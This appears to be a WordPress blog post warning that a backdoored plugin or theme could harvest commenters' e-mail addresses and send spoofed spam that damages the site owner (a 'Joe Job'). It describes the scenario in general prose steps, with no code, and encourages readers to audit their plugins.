A Joe Job is when users of a site are sent spoofed e-mails. These e-mails are filled with all kinds of spam and are intended to tarnish and forever damage the owner of the site. Readers who have received such e-mails can e-mail back, report the site to spam authorities, and even launch their own attacks.
As a WordPress plugin and theme author, it is scary to know that most WordPress blogs can easily be victims of such Joe Jobs. All a plugin or theme author would have to do is build in some kind of back door. If a popular enough site has the plugin or theme installed (and the author is malicious enough), the author can execute the code remotely and all hell can break loose.
Do you think this scenario is too unrealistic? It’s already happened on a large scale on WordPress 2.1.1 (although no damage really occurred).
Here’s what a modern-day WordPress Job Job would look like.
User Installs Theme or Plugin With Malicious Code
When the plugin or theme is activated, the author of the malicious code is e-mailed. Obviously if the author knew what they were doing, none of this would be traceable.
Since the author is e-mailed, the author knows exactly which blogs have his/her code ready to be executed.
Author Runs Malicious Code on User’s Site
The author then runs the code on the user’s site. The author is sent the e-mails of every commentator the site has ever had.
Armed with e-mail addresses, the author is ready to start the Joe Job.
Readers Are Sent Spoofed E-mails
A highly targeted spam campaign is waged against the readers of the user’s site. The user’s return e-mail address is used, and readers are more than happy to express their dissatisfaction.
Readers send in e-mails wondering what is going on, feed subscribers unsubscribe, and the readers start leaving nasty comments. Readers who have blogs begin to blog about this user in a very negative way.
The user has no idea what has happened and what the cause is. And the author of the malicious code is just lurking in the background as the readers of the site rebel.
Hardly. When was the last time you checked the code of your plugins or themes? You never know what you might find and how trustworthy the plugin or theme author really is.
Fortunately the WordPress community is very vigilant and something like this wouldn’t last long. But it is always a good idea to make sure the plugins or themes you install are legit.
A Joe Job can be devastating for any site, but a Joe Job targeted at a site’s readers can be even more so.